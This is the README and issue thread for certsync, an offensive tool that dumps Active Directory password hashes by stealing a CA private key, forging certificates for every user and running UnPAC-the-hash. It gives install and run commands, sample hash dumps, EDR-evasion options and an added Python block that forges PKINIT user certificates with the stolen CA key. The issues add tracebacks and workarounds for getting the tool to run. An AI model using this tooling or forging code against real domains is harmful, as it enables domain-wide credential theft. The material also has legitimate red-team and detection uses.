certsync

certsync is a new technique to dump NTDS remotely, but this time without DRSUAPI: it uses a golden certificate and UnPAC the hash. It works in several steps:

  1. Dump the user list, CA information and CRL from LDAP
  2. Dump the CA certificate and private key
  3. Forge a certificate offline for every user
  4. UnPAC the hash for every user to obtain their NT and LM hashes

$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

Contrary to what one might expect, the attack is not slower than a DRSUAPI-based dump at all.

Installation

Locally:

git clone https://github.com/zblurx/certsync
cd certsync
pip install .

From PyPI:

pip install certsync

From BlackArch:

pacman -S certsync

Usage

$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
                [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and UnPAC the hash

options:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -outputfile OUTPUTFILE
                        base output filename

CA options:
  -ca-pfx pfx/p12 file name
                        Path to CA certificate. If used, will skip backup of CA certificate and private key
  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authentication options:
  -d domain.local, -domain domain.local
                        Domain name
  -u username, -username username
                        Username
  -p password, -password password
                        Password
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
  -scheme ldap scheme
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
  -ldap-filter LDAP_FILTER
                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
  -template cert.pfx    base template to use in order to forge certificates
  -timeout timeout      Timeout between PKINIT connection
  -jitter jitter        Jitter between PKINIT connection
  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

Why

DRSUAPI is increasingly monitored, and sometimes restricted, by EDR solutions. Moreover, certsync does not require a Domain Administrator account: it only requires a CA administrator.

Requirements

This attack needs:

  • A configured Enterprise CA on an ADCS server in the domain,
  • PKINIT working (the domain controllers must hold a certificate usable for Kerberos authentication),
  • A domain account that is local administrator on the ADCS server, or an export of the CA certificate and private key.

Limitations

Since PKINIT cannot be used for users that are revoked, their hashes cannot be dumped.

OPSEC

Some options were added to customize the behaviour of the tool:

  • -ldap-filter: change the LDAP filter used to select the accounts to certsync.
  • -template: use an already issued certificate as a template, so the forged user certificates mimic it.
  • -timeout and -jitter: change the delay, and the random jitter added to it, between PKINIT authentication requests.
  • -randomize: by default, every forged user certificate has the same private key, serial number and validity dates. This parameter randomizes them, but forging takes longer.
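The forging step (step 3 of the procedure above) and the default-versus--randomize behaviour just described, as an added example that is not certsync's or Certipy's own code. It builds a throwaway CA in memory to stand in for the backed-up CA key (in the real attack that key comes from step 2), then forges PKINIT-style user certificates carrying the UPN in the SAN, the Client Authentication and Smart Card Logon EKUs, and the szOID_NTDS_CA_SECURITY_EXT SID extension that strong certificate mapping (KB5014754) requires. The account names come from the output shown above; the lab CA, its validity dates, the domain SID and the DER layout of the SID extension (written here from Microsoft's published structure, not copied from the project) are assumptions. It requires the cryptography package and signs with SHA-256, which also avoids the SHA-1 signing refusal reported in the issues below.

```python
"""Golden-certificate forging: PKINIT-capable user certificates signed with a stolen CA key.
Added example, not certsync's or Certipy's code; the lab CA and the SIDs are constructed."""
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID

UPN_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")              # szOID_NT_PRINCIPAL_NAME
SMARTCARD_LOGON_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.2")  # szOID_KP_SMARTCARD_LOGON
NTDS_CA_SECURITY_EXT = x509.ObjectIdentifier("1.3.6.1.4.1.311.25.2")   # SID extension, KB5014754
# DER of OID 1.3.6.1.4.1.311.25.2.1 (szOID_NTDS_OBJECTSID): arcs 1.3 -> 2B, 311 -> 82 37
NTDS_OBJECTSID_DER = bytes.fromhex("060a2b060104018237190201")

def _der(tag, body):
    """Encode one definite-length DER TLV."""
    n = len(body)
    nb = (n.bit_length() + 7) // 8
    length = bytes([n]) if n < 0x80 else bytes([0x80 | nb]) + n.to_bytes(nb, "big")
    return bytes([tag]) + length + body

def _der_body(buf, tag):
    """Decode one definite-length DER TLV with the expected tag and return its body."""
    if buf[0] != tag:
        raise ValueError(f"expected tag {tag:#x}, got {buf[0]:#x}")
    n, pos = buf[1], 2
    if n & 0x80:
        nb = n & 0x7F
        n, pos = int.from_bytes(buf[2:2 + nb], "big"), 2 + nb
    return buf[pos:pos + n]

def sid_extension(sid):
    """szOID_NTDS_CA_SECURITY_EXT: SEQUENCE { [0] { OID objectSid, [0] { OCTET STRING sid } } } (assumed layout)."""
    other_name = NTDS_OBJECTSID_DER + _der(0xA0, _der(0x04, sid.encode("ascii")))
    return x509.UnrecognizedExtension(NTDS_CA_SECURITY_EXT, _der(0x30, _der(0xA0, other_name)))

def make_lab_ca(name="LAB-CA"):
    """Constructed stand-in for the Enterprise CA key and certificate that certsync backs up."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, name)])
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder().subject_name(subject).issuer_name(subject)
        .public_key(key.public_key()).serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=3650))
        .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
        .sign(key, hashes.SHA256())
    )
    return key, cert

def forge_user_cert(ca_key, ca_cert, upn, sid, user_key=None, serial=None, valid_days=365):
    """Forge a client-auth certificate for `upn` signed by the stolen CA key.
    Reusing user_key and serial for every user is certsync's default; None for both mirrors -randomize."""
    user_key = user_key or rsa.generate_private_key(public_exponent=65537, key_size=2048)
    serial = x509.random_serial_number() if serial is None else serial
    now = datetime.datetime.now(datetime.timezone.utc)
    upn_san = x509.OtherName(UPN_OID, _der(0x0C, upn.encode("utf-8")))  # UTF8String, as AD CS issues it
    return (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, upn.split("@", 1)[0])]))
        .issuer_name(ca_cert.subject)                  # chains to the CA the KDC already trusts
        .public_key(user_key.public_key()).serial_number(serial)
        .not_valid_before(now - datetime.timedelta(minutes=5))
        .not_valid_after(now + datetime.timedelta(days=valid_days))
        .add_extension(x509.SubjectAlternativeName([upn_san]), critical=False)  # UPN -> account mapping
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH, SMARTCARD_LOGON_OID]), critical=False)
        .add_extension(sid_extension(sid), critical=False)  # strong mapping once KB5014754 is enforced
        .sign(ca_key, hashes.SHA256())                 # SHA-256: newer cryptography builds refuse SHA-1
    )

def verify_forged(cert, ca_cert):
    """Check the forgery chains to the CA and return the UPN the KDC would map it to."""
    ca_cert.public_key().verify(cert.signature, cert.tbs_certificate_bytes,
                                padding.PKCS1v15(), cert.signature_hash_algorithm)
    if cert.issuer != ca_cert.subject:
        raise ValueError("issuer does not match the CA subject")
    san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
    for name in san:
        if isinstance(name, x509.OtherName) and name.type_id == UPN_OID:
            return _der_body(name.value, 0x0C).decode("utf-8")
    raise ValueError("no UPN in SAN")

def demo():
    """Two accounts from the page's lab domain (essos.local); the domain SID is constructed."""
    ca_key, ca_cert = make_lab_ca("ESSOS-CA")
    shared_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    # certsync default: one key and one serial for everyone, only the identity changes.
    a = forge_user_cert(ca_key, ca_cert, "khal.drogo@essos.local", "S-1-5-21-1-2-3-1112", shared_key, 0x1337)
    b = forge_user_cert(ca_key, ca_cert, "jorah.mormont@essos.local", "S-1-5-21-1-2-3-1113", shared_key, 0x1337)
    c = forge_user_cert(ca_key, ca_cert, "jorah.mormont@essos.local", "S-1-5-21-1-2-3-1113")  # -randomize
    sid_raw = c.extensions.get_extension_for_oid(NTDS_CA_SECURITY_EXT).value.value
    return {
        "upn_a": verify_forged(a, ca_cert),
        "upn_b": verify_forged(b, ca_cert),
        "sid_c_present": sid_raw.endswith(b"S-1-5-21-1-2-3-1113"),
        "default_shares_serial_and_key": a.serial_number == b.serial_number
        and a.public_key().public_numbers() == b.public_key().public_numbers(),
        "randomized_differs": c.serial_number != b.serial_number
        and c.public_key().public_numbers() != b.public_key().public_numbers(),
    }

if __name__ == "__main__":
    print(demo())
```

Each forged certificate is what step 4 then presents to the KDC over PKINIT; that part needs a live domain controller and is outside this offline example. Whether the KDC accepts the forgery still depends on the issuing CA being published in NTAuthCertificates, on the serial number not being listed in the CRL the KDC checks, and, where strong mapping is enforced, on the SID extension matching the account. Note that the default mode deliberately shares one key and one serial across all forged certificates, which is exactly the artefact a defender can look for in the KDC's certificate-logon events.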

Contributors

lefayjey, noraj, zblurx


Issues

couldn't dumped

There is such a situation: it is a test environment. Before, I could get the hashes with this user. After I reinstalled the certificate server and configured it, I now can't get the hashes with the same user.

└─$ certsync -u Administrator -p 'passpass' -d test.local -dc-ip 10.10.10.10 -ns 10.10.10.10 -debug
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 15 users in LDAP
[*] Found CA test-WIN-abcabc-CA on WIN-abcabc.test.local(10.10.10.10)
[*] Dumping CA certificate and private key
[+] Creating new service
[+] Creating backup
[+] Retrieving backup
[+] Cleaning up
[*] Forging certificates for every users. This can take some time...
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 15/15 [00:00<00:00, 987.45it/s]
[*] PKINIT + UnPAC the hashes
[+] 0 users dumped. 15 users could not be dumped.

Is this caused by PKINIT? How could I set up a test environment for this tool on Active Directory?

cryptography.exceptions.UnsupportedAlgorithm: Hash algorithm "sha1" not supported for signatures

Was trying to use this and kept getting this error:

  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 610, in main
    certsync.run()
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 237, in run
    user.forge_cert(key=base_user_key, cert=base_user_cert, ca_key=self.ca_key, ca_cert=self.ca_cert)
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 64, in forge_cert
    cert = cert.sign(ca_key, signature_hash_algorithm())
  File "/usr/local/lib/python3.9/dist-packages/cryptography/x509/base.py", line 940, in sign
    return rust_x509.create_x509_certificate(self, private_key, algorithm)
cryptography.exceptions.UnsupportedAlgorithm: Hash algorithm "sha1" not supported for signatures

I was able to fix with:

python3.9 -m pip install cryptography==38.0.1

Apparently the Python cryptography library removed support for SHA1.

Tag the source

It would be very helpful if you could tag releases. This would enable distributions to fetch the source from GitHub instead of PyPI.

Thanks

'NoneType' object has no attribute 'subject'

testing this out and getting the above error from multiple CA servers. here is the full command i'm running with debug output.

└─$ python3 entry.py -u xxxx-p "xxxxxxx" -d xxxxx -dc-ip x.x.x.x -ns x.x.x.x -debug
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 1xxxxx users in LDAP
[-] Too much CA, need to select one specific
[*] Please select one:
[0] xxxxx
[1] xxxxxx
[2] xxxxx
[3] xxxxx

3
[*] Found CA xxxxx on xxxxxxxx
[*] Dumping CA certificate and private key
[-] Failed to connect to Service Control Manager Remote Protocol
[*] Forging certificates for every users. This can take some time...
[-] Got error: 'NoneType' object has no attribute 'subject'
Traceback (most recent call last):
File "/home/kali/certsync/certsync/entry.py", line 602, in main
certsync.run()
File "/home/kali/certsync/certsync/entry.py", line 229, in run
base_user_key, base_user_cert = self.forge_cert_base()
File "/home/kali/certsync/certsync/entry.py", line 254, in forge_cert_base
cert = cert.issuer_name(self.ca_cert.subject)
AttributeError: 'NoneType' object has no attribute 'subject'

socket ssl wrapping error: [Errno 104] Connection reset by peer

Hi, I got this error after the following command:

certsync -u username -p password -d xxx.local -dc-ip 10.x.x.x -ns 10.x.x.x

[*] Collecting userlist, CA info and CRL on LDAP
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace

How can I fix it?

AttributeError: 'list' object has no attribute 'split'

Hello Team,

I have updated my Kali Linux and it seems Python has also updated to 3.11.2. When I run the command it throws an error

certsync -d adlab.com -u Administrator -hashes aad3b435b51404eeaad3b435b51404ee:64cbb76dcafe2e977794f6251f8231fb -dc-ip 192.168.126.146 -randomize -ldap-filter "(&(|(objectCategory=person)))" -debug
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 5 users in LDAP
[*] Found CA adlab-WIN-3MBDJTT1P21-CA on WIN-3MBDJTT1P21.adlab.com(192.168.126.146)
[*] Dumping CA certificate and private key
[-] Got error: 'list' object has no attribute 'split'
Traceback (most recent call last):
  File "/home/kali/.local/lib/python3.11/site-packages/certsync/entry.py", line 608, in main
    certsync.run()
  File "/home/kali/.local/lib/python3.11/site-packages/certsync/entry.py", line 206, in run
    ca_target = Target.create(
                ^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/certipy_ad-4.4.0-py3.11.egg/certipy/lib/target.py", line 339, in create
    hashes = hashes.split(":")
             ^^^^^^^^^^^^
AttributeError: 'list' object has no attribute 'split'

Python version
python3 --version
Python 3.11.2

Also, I have updated my certipy to 4.4.0


Got error: 'latin-1' codec can't encode characters in position 0-12: ordinal not in range(256)

Hi, I'm testing certsync and getting following decoding error:

[*] Collecting userlist, CA info and CRL on LDAP
[*] Found XX users in LDAP
[*] Loading CA certificate and private key from administrator.pfx
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
[-] Got error: 'latin-1' codec can't encode characters in position 0-12: ordinal not in range(256)
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 615, in main
    certsync.run()
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 252, in run
    if user.auth(target=self.target):
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 74, in auth
    return self.authenticate(auth=auth)
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 94, in authenticate
    if auth.kerberos_authentication(
  File "/usr/local/lib/python3.9/dist-packages/certipy/commands/auth.py", line 355, in kerberos_authentication
    as_req, diffie = build_pkinit_as_req(username, domain, self.key, self.cert)
  File "/usr/local/lib/python3.9/dist-packages/certipy/lib/pkinit.py", line 285, in build_pkinit_as_req
    kdc_req_body_data['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3430, in __init__
    raise e
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3414, in __init__
    self.__setitem__(key, value[key])
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3570, in __setitem__
    new_value = self._make_value(field_name, field_spec, value_spec, field_params, value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3825, in _make_value
    new_value = value_spec(value, **field_params)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4204, in __init__
    raise e
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4195, in __init__
    self.__setitem__(index, child)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4352, in __setitem__
    new_value = self._make_value(value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4302, in _make_value
    return self._child_spec(value=value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 1677, in __init__
    raise e
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 1669, in __init__
    self.set(value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 1797, in set
    self.contents = value.encode(self._encoding)
UnicodeEncodeError: 'latin-1' codec can't encode characters in position 0-12: ordinal not in range(256)

It is worth mentioning that there are Cyrillic users in AD. I tried looking in different places and even patched asn1crypto/core.py to use utf-8 instead of latin-1. However, it didn't help: the exception was gone, but the result was [+] 0 users dumped.

P.S. It may be a problem with my lab, since I'm not able to dump the hash for a single user (with proper encoding). Feel free to ignore this issue for now.

Socket ssl wrapping error: [Errno 54] Connection reset by peer

Hi, I got this error:
[*] Collecting userlist, CA info and CRL on LDAP
[-] Got error: socket ssl wrapping error: [Errno 54] Connection reset by peer
[-] Use -debug to print a stacktrace

This is when I use -debug:
[-] Got error: socket ssl wrapping error: [Errno 54] Connection reset by peer
Traceback (most recent call last):
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 77, in connect
self.connect(version=ssl.PROTOCOL_TLSv1_2)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 128, in connect
bind_result = ldap_conn.bind()
File "/Users/test.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/core/connection.py", line 589, in bind
self.open(read_server_info=False)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/sync.py", line 57, in open
BaseStrategy.open(self, reset_usage, read_server_info)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/base.py", line 146, in open
raise exception_history[0][0]
ldap3.core.exceptions.LDAPSocketOpenError: socket ssl wrapping error: [Errno 54] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certsync/entry.py", line 602, in main
certsync.run()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certsync/entry.py", line 169, in run
self.init_ldap_conn()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certsync/entry.py", line 161, in init_ldap_conn
self.ldap_connection.connect()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 83, in connect
self.connect(version=ssl.PROTOCOL_TLSv1)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 128, in connect
bind_result = ldap_conn.bind()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/core/connection.py", line 589, in bind
self.open(read_server_info=False)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/sync.py", line 57, in open
BaseStrategy.open(self, reset_usage, read_server_info)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/base.py", line 146, in open
raise exception_history[0][0]
ldap3.core.exceptions.LDAPSocketOpenError: socket ssl wrapping error: [Errno 54] Connection reset by peer

Is this issue caused by firewall?
Thank you.

'list' object has no attribute 'split' when choosing multiple CIs

Hello Team,

During one of the assessments, it was observed that the org has multiple CIs and asked to choose one when I select and got an error

[*] Found 1 user in LDAP
[-] Too much CA, need to select one specific
[*] Please select one:
[0] ISSUING-test1 at test1.adblab.com
[1] ISSUING-test2 at test2.adblab.com
[2] Issuing-test3 at test3.adblab.com

2
[*] Found CA ISSUING-test2 on test2.adblab.com
[*] Dumping CA certificate and private key
[-] Got error: 'list' object has no attribute 'split'
[-] Use -debug to print a stacktrace

I have tried both certipy v4.4 and 4.3, and Python versions 3.10 and 3.11, but still get the same error. It would be great if you could help with this.

Wrong link for Golden Certificate

Resource linked in the README for Golden Certificate is not the right one.

CertSync relies on the extraction of the CA cert private key, to forge and sign certificates (this is called Golden Certificate) in order to do UnPAC-the-hash later on.

The resource indicated in the README (https://cyberstoph.org/posts/2019/12/an-introduction-to-golden-certificates/) refers to a different technique, but called the same. The technique shown in the post relies on DPERSIST3, where the attacker has enough privileges against a certificate template, to modify it and make it a SmartCard certificate template.

More info: https://www.thehacker.recipes/ad/persistence/ad-cs/golden-certificate
